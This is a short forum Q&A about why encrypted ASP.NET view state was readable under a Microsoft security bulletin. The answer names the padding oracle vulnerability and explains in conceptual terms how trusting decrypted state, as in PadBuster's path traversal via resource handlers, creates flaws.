While reading up on view state as a possible means to prevent CSRF, I came across this Microsoft Security Bulletin which states:
An attacker who successfully exploited this vulnerability could read data, such as the view state, which was encrypted by the server.
I had always heard that encrypted view state was secure. Does anyone have any details on how this exploit works? I did some googling but didn't find any details.
This is the infamous Padding Oracle vulnerability, this is the original paper describing the vulnerability in detail.
View State related exploitation would strongly depend on the actual application logic. If the state information is properly encrypted and integrity checked the application (developer) can safely presume that the included data is trustworthy (e.g. input validation was already performed or the data originates from the server not the client). Without proper defense-in-depth measures in place this can cause a situation similar to a TOC-TOU conflict resulting in a security vulnerability.
Example: PadBuster exploits the fact that the WebResource/ScriptResource handlers presume that their parameter could only properly be set by the server and didn't check for path traversal.
